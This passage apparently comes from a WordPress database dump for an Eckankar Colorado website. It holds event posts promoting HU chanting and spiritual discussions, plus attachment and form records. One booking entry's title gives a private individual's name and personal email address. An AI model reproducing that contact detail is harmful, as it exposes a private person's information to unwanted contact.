fork, aligning Soul to higher states of love, creativity, healing, and awareness. When sung or chanted with an open heart, it opens the lines of communication to the most sacred part of yourself.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">In this event, you will have the opportunity to experience some of the many benefits of singing HU:</span></p>\r\n<ul class=\"pl-5 list-disc mb-4\">\r\n	<li><span style=\"font-size: 14pt;\">Inner peace and calm</span></li>\r\n	<li><span style=\"font-size: 14pt;\">Divine love</span></li>\r\n	<li><span style=\"font-size: 14pt;\">Expanded awareness</span></li>\r\n	<li><span style=\"font-size: 14pt;\">Spiritual self-discovery and growth</span></li>\r\n	<li><span style=\"font-size: 14pt;\">Healing of the heart</span></li>\r\n</ul>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">We will chant HU for 15 to 20 minutes, have a few minutes of quiet contemplation followed by spiritual conversation with others of like heart.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">This event is sponsored by Eckankar and is free of charge.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Find out more about HU at&nbsp;<a class=\"text-viridian\" href=\"https://www.eckankar.org/experience/hu-the-sound-of-soul/\" target=\"_blank\" rel=\"nofollow noopener ugc\">What is HU? | HU is the Sound of Soul | ECKANKAR</a>.</span></p>\r\n<p class=\"\"><a class=\"meetupreg\" href=\"https://www.meetup.com/segofdenver/events/292217467/\" target=\"_blank\" rel=\"noopener noreferrer\">Register Now!</a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','Awaken to Higher Consciousness','','publish','closed','closed','','awaken-to-higher-consciousnessin-person-discussion','','','2023-03-27 13:52:58','2023-03-27 19:52:58','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=268195',0,'mec-events','',0),(267974,0,'2023-02-14 12:18:48','2023-02-14 19:18:48','','','','publish','closed','closed','','267974','','','2023-02-14 12:18:48','2023-02-14 19:18:48','',0,'https://eckankar-colorado.org/nf_sub/267974/',0,'nf_sub','',0),(267990,2,'2023-02-14 16:48:44','2023-02-14 23:48:44','','waterfall-5-notxt','','inherit','closed','closed','','waterfall-5-notxt','','','2023-02-14 16:48:44','2023-02-14 23:48:44','',0,'https://eckankar-colorado.org/wp-content/uploads/2023/02/waterfall-5-notxt.jpg',0,'attachment','image/jpeg',0),(268005,2,'2023-02-14 20:37:22','2023-02-15 03:37:22','','favicon-g3','','inherit','closed','closed','','favicon-g3','','','2023-02-14 20:37:22','2023-02-15 03:37:22','',0,'https://eckankar-colorado.org/wp-content/uploads/2023/02/favicon-g3.png',0,'attachment','image/png',0),(268006,2,'2023-02-14 20:37:36','2023-02-15 03:37:36','https://eckankar-colorado.org/wp-content/uploads/2023/02/cropped-favicon-g3.png','cropped-favicon-g3.png','','inherit','closed','closed','','cropped-favicon-g3-png','','','2023-02-14 20:37:36','2023-02-15 03:37:36','',0,'https://eckankar-colorado.org/wp-content/uploads/2023/02/cropped-favicon-g3.png',0,'attachment','image/png',0),(268012,2,'2023-02-15 12:12:17','2023-02-15 19:12:17','','outlook online-1','','inherit','closed','closed','','outlook-online-1','','','2023-02-15 12:12:17','2023-02-15 19:12:17','',0,'https://eckankar-colorado.org/wp-content/uploads/2023/02/outlook-online-1.png',0,'attachment','image/png',0),(268013,2,'2023-02-15 12:12:25','2023-02-15 19:12:25','','outlook online-2--for adding domain','','inherit','closed','closed','','outlook-online-2-for-adding-domain','','','2023-02-15 12:12:25','2023-02-15 19:12:25','',0,'https://eckankar-colorado.org/wp-content/uploads/2023/02/outlook-online-2-for-adding-domain.png',0,'attachment','image/png',0),(268014,2,'2023-02-15 12:12:40','2023-02-15 19:12:40','','outlook online-3--for adding domain','','inherit','closed','closed','','outlook-online-3-for-adding-domain','','','2023-02-15 12:12:40','2023-02-15 19:12:40','',0,'https://eckankar-colorado.org/wp-content/uploads/2023/02/outlook-online-3-for-adding-domain.png',0,'attachment','image/png',0),(268015,2,'2023-02-15 12:12:48','2023-02-15 19:12:48','','outlook online-4--for adding domain','','inherit','closed','closed','','outlook-online-4-for-adding-domain','','','2023-02-15 12:12:48','2023-02-15 19:12:48','',0,'https://eckankar-colorado.org/wp-content/uploads/2023/02/outlook-online-4-for-adding-domain.png',0,'attachment','image/png',0),(268016,2,'2023-02-15 12:16:40','2023-02-15 19:16:40','','--for adding full email','','inherit','closed','closed','','for-adding-full-email','','','2023-02-15 12:16:40','2023-02-15 19:16:40','',0,'https://eckankar-colorado.org/wp-content/uploads/2023/02/for-adding-full-email.png',0,'attachment','image/png',0),(268017,2,'2023-02-15 12:22:34','2023-02-15 19:22:34','','--for adding full email-junk','','inherit','closed','closed','','for-adding-full-email-junk','','','2023-02-15 12:22:34','2023-02-15 19:22:34','',0,'https://eckankar-colorado.org/wp-content/uploads/2023/02/for-adding-full-email-junk.png',0,'attachment','image/png',0),(268025,2,'2023-02-17 10:57:23','2023-02-17 17:57:23','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<div class=\"break-words\">\r\n<p class=\"\" style=\"border-width: 0px; font-size: 25px;\"><strong>Awaken to Higher Consciousness</strong><br>\r\n<strong>Tune into the Sound current with HU.</strong></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">You are warmly invited to experience HU, a divine sound that courses through all of life and through every atom of your body. HU is an ancient name for God, a sacred sound and a carrier of love between Soul and God. It has been sung for thousands of years, and in many places, for spiritual unfoldment. It can uplift people of any religion, culture, or walk of life.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Singing HU acts as a tuning fork, aligning Soul to higher states of love, creativity, healing, and awareness. When sung or chanted with an open heart, it opens the lines of communication to the most sacred part of yourself.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">In this ONLINE event, you will have the opportunity to experience some of the many benefits of singing HU:</span></p>\r\n<ul class=\"\">\r\n	<li class=\"mb-4\"><span style=\"font-size: 14pt;\">Inner peace and calm</span></li>\r\n	<li class=\"mb-4\"><span style=\"font-size: 14pt;\">Divine love</span></li>\r\n	<li class=\"mb-4\"><span style=\"font-size: 14pt;\">Expanded awareness</span></li>\r\n	<li class=\"mb-4\"><span style=\"font-size: 14pt;\">Spiritual self-discovery and growth</span></li>\r\n	<li class=\"mb-4\"><span style=\"font-size: 14pt;\">Healing of the heart</span></li>\r\n</ul>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">The event will include singing HU for 15 to 20 minutes, a few minutes of quiet contemplation, and discussion groups in Zoom breakout rooms, where you can participate in spiritual conversation with others of like heart.</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">This event is sponsored by Eckankar and is free of charge. Find out more about HU at <a class=\"text-viridian\" href=\"https://www.eckankar.org/experience/hu-the-sound-of-soul/\" target=\"_blank\" rel=\"nofollow noopener ugc\">What is HU? | HU is the Sound of Soul | ECKANKAR</a>.</span><span style=\"color: #333333;\"><span style=\"font-size: 14pt;\"><strong><span style=\"color: #1d5791;\"> <br>\r\n</span></strong></span></span></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','Sound of Soul Event - Online','','publish','closed','closed','','sound-of-soul-event-online','','','2023-02-17 11:05:25','2023-02-17 18:05:25','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=268025',0,'mec-events','',0),(269121,15,'2023-09-28 07:24:06','2023-09-28 13:24:06','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<p class=\"\"><strong><span style=\"font-size: 18pt; color: #ad7f14;\">What is Spiritual Freedom?<br>\r\n</span></strong></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">What is Spiritual Freedom? Are you everything you want to be? You came into this life to spread your wings and live in freedom - heart, mind and Soul!</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Author Harold Klemp put the tools of spiritual freedom in your grasp:</span></p>\r\n<ul class=\"pl-5 list-disc mb-4\">\r\n	<li><span style=\"font-size: 14pt;\">Keys to embrace the highest expression of who you really are</span></li>\r\n	<li><span style=\"font-size: 14pt;\">Techniques to tap into the divine Life Force for unlimited creativity and problem solving</span></li>\r\n	<li><span style=\"font-size: 14pt;\">New paradigms to reveal the power of loving yourself, God and all of life.</span></li>\r\n</ul>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">You do not need to have attended prior classes or have read the book to participate. We will have complimentary copies available. Hope to see you there!</span></p>\r\n<p class=\"\"><a class=\"meetupreg\" href=\"https://www.meetup.com/spiritual-experiences-of-loveland/events/296358193/\" target=\"_blank\" rel=\"noopener noreferrer\">Register Now!</a></p>\r\n<p class=\"\"><span style=\"font-size: 12pt;\"><strong>COVID-19 Safety Measures<br>\r\n**</strong> <em>Since contracting COVID-19 may still be possible, please take the health steps you consider best. It is appreciated that by attending you are taking responsibility for your own health.</em></span></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','Achieving Spiritual Freedom in this Lifetime','','publish','closed','closed','','title-goes-herein-person-discussion-meetup-template-982-461','','','2023-09-28 07:24:06','2023-09-28 13:24:06','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=269121',0,'mec-events','',0),(269122,15,'2023-09-28 07:20:31','2023-09-28 13:20:31','','TemplePool','','inherit','closed','closed','','templepool','','','2023-09-28 07:20:31','2023-09-28 13:20:31','',269121,'https://eckankar-colorado.org/wp-content/uploads/2023/09/TemplePool.webp',0,'attachment','image/webp',0),(269124,0,'2023-09-28 07:47:53','2023-09-28 13:47:53','','','','publish','closed','closed','','269124','','','2023-09-28 07:47:53','2023-09-28 13:47:53','',0,'https://eckankar-colorado.org/nf_sub/269124/',0,'nf_sub','',0),(269154,0,'2023-10-03 07:18:39','2023-10-03 13:18:39','','','','publish','closed','closed','','269154','','','2023-10-03 07:18:39','2023-10-03 13:18:39','',0,'https://eckankar-colorado.org/nf_sub/269154/',0,'nf_sub','',0),(269155,0,'2023-10-03 08:39:30','2023-10-03 14:39:30','','','','publish','closed','closed','','269155','','','2023-10-03 08:39:30','2023-10-03 14:39:30','',0,'https://eckankar-colorado.org/nf_sub/269155/',0,'nf_sub','',0),(269156,0,'2023-10-03 08:44:12','2023-10-03 14:44:12','','','','publish','closed','closed','','269156','','','2023-10-03 08:44:12','2023-10-03 14:44:12','',0,'https://eckankar-colorado.org/nf_sub/269156/',0,'nf_sub','',0),(269157,1000012,'2023-10-08 10:30:00','2023-10-08 16:30:00','','Lynn Gardner - lynnie626@gmail.com','','publish','closed','closed','','lynn-gardner-lynnie626gmail-com-6','','','2023-10-08 10:30:00','2023-10-08 16:30:00','',0,'https://eckankar-colorado.org/?post_type=mec-books&p=269157',0,'mec-books','',0),(269197,0,'2023-10-11 19:22:39','2023-10-12 01:22:39','','','','publish','closed','closed','','269197','','','2023-10-11 19:22:39','2023-10-12 01:22:39','',0,'https://eckankar-colorado.org/nf_sub/269197/',0,'nf_sub','',0),(269160,15,'2023-10-03 17:34:56','2023-10-03 23:34:56','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<p class=\"\"><strong><span style=\"font-size: 18pt; color: #ad7f14;\">Seeing, Knowing, Being<br>\r\n</span></strong></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Embark on an expansive journey – an in-person spiritual discussion to learn ways to tap into the God knowledge that is already within you.</span></p>\r\n<ul class=\"pl-5 list-disc mb-4\">\r\n	<li><span style=\"font-size: 14pt;\">What makes a spiritual life? Do you want freedom, knowledge, truth, or wisdom? Love?</span></li>\r\n	<li><span style=\"font-size: 14pt;\">Would you like to enjoy a heightened state of awareness 24 hours a day?</span></li>\r\n	<li><span style=\"font-size: 14pt;\">Are you interested in tapping into your own inner wisdom to help you in your daily life?</span></li>\r\n</ul>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">If you answered yes to any of these questions, then this Meetup is for you. We will highlight techniques to help you learn how to have more of God’s love in your life. Our goal is that each person will gain spiritual insights that can make their life better.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">All are welcome to join us. Free books will be available and there is no need to have the books ahead of time.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">This event, sponsored by&nbsp;<a class=\"!text-viridian\" href=\"https://www.eckankar.org/\" target=\"_blank\" rel=\"nofollow noopener ugc\">Eckankar</a> as a community service, is a spiritual resource for people of all faiths and beliefs. Eckankar is the Path of Spiritual Freedom. It is an individual, creative practice to experience and explore our own unique relationship with the Divine.</span></p>\r\n<p class=\"\"><a class=\"meetupreg\" href=\"https://www.meetup.com/spiritual-experiences-group-of-parker/events/296519996/\" target=\"_blank\" rel=\"noopener noreferrer\">Register Now!</a></p>\r\n<p class=\"\"><span style=\"font-size: 12pt;\"><strong>COVID-19 Safety Measures<br>\r\n**</strong> <em>Since contracting COVID-19 may still be possible, please take the health steps you consider best. It is appreciated that by attending you are taking responsibility for your own health.</em></span></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','Beyond Soul Travel','','publish','closed','closed','','title-goes-herein-person-discussion-meetup-template-705','','','2023-10-03 17:34:56','2023-10-03 23:34:56','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=269160',0,'mec-events','',0),(268029,2,'2023-02-17 11:34:55','2023-02-17 18:34:55','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\" style=\"border-width: 0px; font-weight: 600;\" data-font-weight=\"600\"><br>\r\n<span style=\"font-size: 14pt;\">You are warmly invited to experience HU, a divine sound that courses through all of life and through every atom of your body.</span></p>\r\n<p class=\"\" style=\"border-width: 0px;\"><span style=\"font-size: 14pt;\"> HU is an ancient name for God, a sacred sound and a carrier of love between Soul and God. It has been sung for thousands of years, and in many places, for spiritual unfoldment. It can uplift people of any religion, culture, or walk of life.</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">Singing HU acts as a tuning fork, aligning Soul to higher states of love, creativity, healing, and awareness. When sung or chanted with an open heart, it opens the lines of communication to the most sacred part of yourself.</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">In this event, you will have the opportunity to experience some of the many benefits of singing HU:</span></p>\r\n<ul class=\"\">\r\n	<li><span style=\"font-size: 14pt;\">Inner peace and calm</span></li>\r\n	<li><span style=\"font-size: 14pt;\">Divine love</span></li>\r\n	<li><span style=\"font-size: 14pt;\">Expanded awareness</span></li>\r\n	<li><span style=\"font-size: 14pt;\">Spiritual self-discovery and growth</span></li>\r\n	<li><span style=\"font-size: 14pt;\">Healing of the heart</span></li>\r\n</ul>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">The event will include singing HU for 15 to 20 minutes, a few minutes of quiet contemplation, followed by spiritual conversation with others of like heart.</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">This event, sponsored by Eckankar as a community service, is a spiritual resource for people of all faiths and beliefs. Eckankar is the Path of Spiritual Freedom. It is an individual, creative practice to experience and explore our own unique relationship with the Divine.</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">Find out more about HU at <a class=\"text-viridian\" href=\"https://www.eckankar.org/experience/hu-the-sound-of-soul/\" target=\"_blank\" rel=\"nofollow noopener ugc\">What is HU? | HU is the Sound of Soul | ECKANKAR</a>.</span></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"bg-white rounded-lg\">\r\n<div class=\"p-5\">\r\n<div class=\"\">\r\n<div></div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\"><a class=\"meetupreg\" href=\"https://www.meetup.com/segofdenver/events/291621509/\" target=\"_blank\" rel=\"noopener noreferrer\">Register Now!</a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','\'Explore a Daily Practice for More Joy, Wisdom, and Peace\'<br>In Person Discussion','','publish','closed','closed','','explore-a-daily-practice-for-more-joy-wisdom-and-peacein-person-discussion','','','2023-02-17 11:37:31','2023-02-17 18:37:31','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=268029',0,'mec-events','',0),(268030,2,'2023-02-17 11:33:50','2023-02-17 18:33:50','','man-sea-sitting-1','','inherit','closed','closed','','man-sea-sitting-1','','','2023-02-17 11:33:50','2023-02-17 18:33:50','',268029,'https://eckankar-colorado.org/wp-content/uploads/2023/02/man-sea-sitting-1.jpg',0,'attachment','image/jpeg',0),(268031,2,'2023-02-17 11:46:16','2023-02-17 18:46:16','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\"><span style=\"font-size: 17pt;\"><strong>Are we human beings having a spiritual experience, or spiritual beings having a human experience?</strong></span></p>\r\n<p class=\"\"><span style=\"font-size: 17pt;\"><strong>The answer is: All of the above, it all depends on your viewpoint!</strong></span></p>\r\n<p><span style=\"font-size: 14pt;\">You are warmly invited to come and join us as we explore the ways we can switch our perspective: from the human to the spiritual. We’ll explore:</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">* What it means to live a Soul directed life</span></p>\r\n<p><span style=\"font-size: 14pt;\">* How it can help us deal with the problems we have today</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">* Tools to help you switch to a spiritual viewpoint</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">All are welcome – family and friends – so come join the discussion and share experiences, insights, spiritual practices and tips.</span></p>\r\n<blockquote class=\"\">\r\n<p class=\"\"><span style=\"font-size: 14pt;\">“You are Soul. It is the real you. You are a timeless, deathless spark of God – in love, strength and beauty – upheld by the always present Light and Sound, the Holy Spirit.” —Harold Klemp,<em> The Spiritual Life</em>, p. 75</span></p>\r\n</blockquote>\r\n<p class=\"\">&nbsp;</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"bg-white rounded-lg\">\r\n<div class=\"p-5\">\r\n<div class=\"\"><span style=\"font-size: 12pt;\"><strong>COVID-19 Safety Measures</strong></span></div>\r\n<div class=\"\">\r\n<div><span class=\"\" style=\"font-size: 12pt;\"><strong>**</strong><em>Since contracting COVID-19 may still be possible, please take the health steps you consider best. It is appreciated that by attending you are taking responsibility for your own health.</em></span></div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\">&nbsp;</p>\r\n<p class=\"\"><a class=\"meetupreg\" href=\"https://www.meetup.com/segofdenver/events/291621852/\" target=\"_blank\" rel=\"noopener noreferrer\">Register Now!</a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','\'How to Live a Soul-Directed Life\'<br>In Person Discussion','','publish','closed','closed','','how-to-live-a-soul-directed-lifein-person-discussion','','','2023-02-17 11:48:38','2023-02-17 18:48:38','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=268031',0,'mec-events','',0),(268041,15,'2023-02-21 17:48:28','2023-02-22 00:48:28','','Seminars','','inherit','closed','closed','','seminars','','','2023-02-21 17:48:28','2023-02-22 00:48:28','',45842,'https://eckankar-colorado.org/wp-content/uploads/2023/02/Seminars.jpg',0,'attachment','image/jpeg',0),(268042,15,'2023-02-21 17:48:44','2023-02-22 00:48:44','','ECK Light and Sound Service','','inherit','closed','closed','','eck-light-and-sound-service','','','2023-02-21 17:48:44','2023-02-22 00:48:44','',45842,'https://eckankar-colorado.org/wp-content/uploads/2023/02/ECK-Light-and-Sound-Service.jpg',0,'attachment','image/jpeg',0),(268043,15,'2023-02-21 17:48:54','2023-02-22 00:48:54','','Easy Way','','inherit','closed','closed','','easy-way','','','2023-02-21 17:48:54','2023-02-22 00:48:54','',45842,'https://eckankar-colorado.org/wp-content/uploads/2023/02/Easy-Way.jpg',0,'attachment','image/jpeg',0),(268044,15,'2023-02-21 17:48:58','2023-02-22 00:48:58','','Spiritual Discussions','','inherit','closed','closed','','spiritual-discussions','','','2023-02-21 17:48:58','2023-02-22 00:48:58','',45842,'https://eckankar-colorado.org/wp-content/uploads/2023/02/Spiritual-Discussions.jpg',0,'attachment','image/jpeg',0),(268048,2,'2023-02-22 12:12:01','2023-02-22 19:12:01','','HI Conf Registration Form 10 Feb 23','','inherit','closed','closed','','hi-conf-registration-form-10-feb-23','','','2023-02-22 12:12:01','2023-02-22 19:12:01','',0,'https://eckankar-colorado.org/wp-content/uploads/2023/02/HI-Conf-Registration-Form-10-Feb-23.pdf',0,'attachment','application/pdf',0),(268074,2,'2023-02-22 15:23:08','2023-02-22 22:23:08','','waterfall-6-notxt-Final','','inherit','closed','closed','','waterfall-6-notxt-final','','','2023-02-22 15:23:08','2023-02-22 22:23:08','',68102,'https://eckankar-colorado.org/wp-content/uploads/2023/02/waterfall-6-notxt-Final.jpg',0,'attachment','image/jpeg',0),(268076,0,'2023-02-22 22:14:09','2023-02-23 05:14:09','','','','publish','closed','closed','','268076','','','2023-02-22 22:14:09','2023-02-23 05:14:09','',0,'https://eckankar-colorado.org/nf_sub/268076/',0,'nf_sub','',0),(268077,2,'2023-02-23 09:10:08','2023-02-23 16:10:08','','2023-HI-overview-registration','','inherit','closed','closed','','2023-hi-overview-registration','','','2023-02-23 09:10:08','2023-02-23 16:10:08','',0,'https://eckankar-colorado.org/wp-content/uploads/2023/02/2023-HI-overview-registration.pdf',0,'attachment','application/pdf',0),(268095,2,'2023-02-25 09:18:22','2023-02-25 16:18:22','','HI Conf Overview-FINAL-2-14-23','','inherit','closed','closed','','hi-conf-overview-final-2-14-23','','','2023-02-25 09:18:22','2023-02-25 16:18:22','',0,'https://eckankar-colorado.org/wp-content/uploads/2023/02/HI-Conf-Overview-FINAL-2-14-23.pdf',0,'attachment','application/pdf',0),(268102,2,'2023-02-25 10:53:36','2023-02-25 17:53:36','','favicon-gold-lg','','inherit','closed','closed','','favicon-gold-lg','','','2023-02-25 10:53:36','2023-02-25 17:53:36','',0,'https://eckankar-colorado.org/wp-content/uploads/2023/02/favicon-gold-lg.png',0,'attachment','image/png',0),(268103,2,'2023-02-25 10:54:10','2023-02-25 17:54:10','https://eckankar-colorado.org/wp-content/uploads/2023/02/cropped-favicon-gold-lg.png','cropped-favicon-gold-lg.png','','inherit','closed','closed','','cropped-favicon-gold-lg-png','','','2023-02-25 10:54:10','2023-02-25 17:54:10','',0,'https://eckankar-colorado.org/wp-content/uploads/2023/02/cropped-favicon-gold-lg.png',0,'attachment','image/png',0),(268282,2,'2023-04-23 14:55:41','2023-04-23 20:55:41','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\"><strong><span style=\"font-size: 14pt;\">— This Event Is Available To Members Of Eckankar —</span></strong></p>\r\n<p class=\"\">&nbsp;</p>\r\n<blockquote class=\"bg-blockquote border\" style=\"border-color: #f28a27; margin-top: -15px; margin-left: 20px;\">\r\n<p><span style=\"color: #666666;\">“The ECK Temple is a very special place. It\'s an outer symbol for the holy temple of God within the heart of all people. Visitors to it often remark upon a presence—a very definite, loving, divine one. The Temple reflects and resonates with the Light and Sound of God, and many people mention this sense of being in a unique, holy place.”</span><br>\r\n<span style=\"font-size: 12pt; color: #666666;\">— Sri Harold Klemp</span></p>\r\n</blockquote>\r\n<div><span class=\"\" style=\"font-size: 14pt;\">We are excited to announce a spring beautify day at the ECK Temple of Colorado! This spring, we would like to give the chelas of Colorado an opportunity to refresh, renew, and rededicate themselves to our goals of Self-Realization and God-Realization by revitalizing the sacred ground around the ECK Temple of Colorado. </span><br>\r\n<span class=\"\" style=\"font-size: 14pt;\">It will be a joyous occasion, where chelas can express their love of the ECK by gardening, washing windows, and beautifying the Temple grounds. We will also enjoy fellowship and a good meal together.</span><br>\r\n<br>\r\n<span class=\"\" style=\"font-size: 14pt;\">Open-hearted celebration of ECK traditions such as this one creates beacons of Light and Sound all over the globe and affects the consciousness of the world. Please join us as we celebrate in the name of Sugmad, the ECK, and the Mahanta.</span></div>\r\n<div><br>\r\n<p class=\"\"><span style=\"color: #f28a27;\"><strong><span style=\"font-size: 14pt;\">Beautify Day Schedule <span style=\"color: #333333;\">- </span></span></strong></span><strong><span style=\"font-size: 14pt;\">Saturday, May 13</span></strong></p>\r\n<div style=\"padding-left: 40px;\"><span class=\"\" style=\"font-size: 14pt;\">10:00 a.m. HU Song</span></div>\r\n<div style=\"padding-left: 40px;\"><span class=\"\" style=\"font-size: 14pt;\">10:30 a.m. Beautification Activities</span></div>\r\n<div style=\"padding-left: 40px;\"><span style=\"font-size: 14pt;\">12:15 p.m. Potluck&nbsp; &nbsp;</span></div>\r\n<p class=\"\" style=\"padding-left: 40px;\"><strong>&nbsp;</strong></p>\r\n</div>\r\n<div>\r\n<p class=\"\"><span style=\"font-size: 14pt;\"><span style=\"color: #f28a27;\"><strong>Note:</strong> </span>Please bring a side dish to share based on the list below as it relates to your last name:</span></p>\r\n<ul class=\"\">\r\n	<li><span style=\"font-size: 14pt;\"><strong>A-G:</strong> Salad, Fruit, Vegetables</span></li>\r\n	<li><span style=\"font-size: 14pt;\"><strong>H-O:</strong> Hot Side Dishes</span></li>\r\n	<li><span style=\"font-size: 14pt;\"><strong>P-S:</strong> Chips, Dips, Beverages</span></li>\r\n	<li><span style=\"font-size: 14pt;\"><strong>T-Z:</strong> Desserts</span></li>\r\n</ul>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','2023 Beautify Day - A New ECK Tradition','','publish','closed','closed','','2023-beautify-day-a-new-eck-tradition-working-waiting-for-start-and-end-time','','','2023-04-23 14:57:18','2023-04-23 20:57:18','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=268282',0,'mec-events','',0),(269012,2,'2023-09-07 09:30:53','2023-09-07 15:30:53','','ixlibrb-0.3.5q80fmjpgcropentropycstinysrgbw1600h900fitcrops19bf20c1b7fea35185874310607373d2','','inherit','closed','closed','','ixlibrb-0-3-5q80fmjpgcropentropycstinysrgbw1600h900fitcrops19bf20c1b7fea35185874310607373d2','','','2023-09-07 09:30:53','2023-09-07 15:30:53','',0,'https://eckankar-colorado.org/wp-content/uploads/2023/09/ixlibrb-0.3.5q80fmjpgcropentropycstinysrgbw1600h900fitcrops19bf20c1b7fea35185874310607373d2.jpg',0,'attachment','image/jpeg',0),(269013,2,'2023-09-07 09:31:14','2023-09-07 15:31:14','','ixlibrb-0.3.5q80fmjpgcropentropycstinysrgbw1600h900fitcrops4a9643f7f3d94a2d4f9082f253a534ee','','inherit','closed','closed','','ixlibrb-0-3-5q80fmjpgcropentropycstinysrgbw1600h900fitcrops4a9643f7f3d94a2d4f9082f253a534ee','','','2023-09-07 09:31:14','2023-09-07 15:31:14','',0,'https://eckankar-colorado.org/wp-content/uploads/2023/09/ixlibrb-0.3.5q80fmjpgcropentropycstinysrgbw1600h900fitcrops4a9643f7f3d94a2d4f9082f253a534ee.jpg',0,'attachment','image/jpeg',0),(269018,2,'2023-09-09 11:26:32','2023-09-09 17:26:32','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\"><strong><span style=\"font-size: 20pt;\">Ready For Some Spiritual Conversation?</span></strong></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">Spiritual discussions are forums that dive deep into spiritual topics. You’ll be able to share your spiritual experiences, perspectives, or questions. If you prefer to listen and learn, that’s cool too!</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">People of all faiths and backgrounds are welcome. There’s no need to register—just drop in.</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">Explore this spiritual topic with other participants in a lively discussion led by an ECK Spiritual Aide (ESA), a specially trained member of the ECK clergy.<br>\r\n</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">Preceded by a HU Chant from 9:45 - 10:15 a.m.</span></p>\r\n<p class=\"\"><span style=\"font-size: 12pt;\"><strong>COVID-19 Safety Measures<br>\r\n**</strong> <em>Since contracting COVID-19 may still be possible, please take the health steps you consider best. It is appreciated that by attending you are taking responsibility for your own health.</em></span></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','Good Karma, Bad Karma, Beyond Karma','','publish','closed','closed','','good-karma-bad-karma-beyond-karma-3','','','2023-09-09 11:26:32','2023-09-09 17:26:32','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=269018',0,'mec-events','',0),(269020,2,'2023-09-09 12:22:40','2023-09-09 18:22:40','','web-promo-bk-4','','inherit','closed','closed','','web-promo-bk-4','','','2023-09-09 12:22:40','2023-09-09 18:22:40','',269010,'https://eckankar-colorado.org/wp-content/uploads/2023/09/web-promo-bk-4.jpg',0,'attachment','image/jpeg',0),(269023,2,'2023-09-09 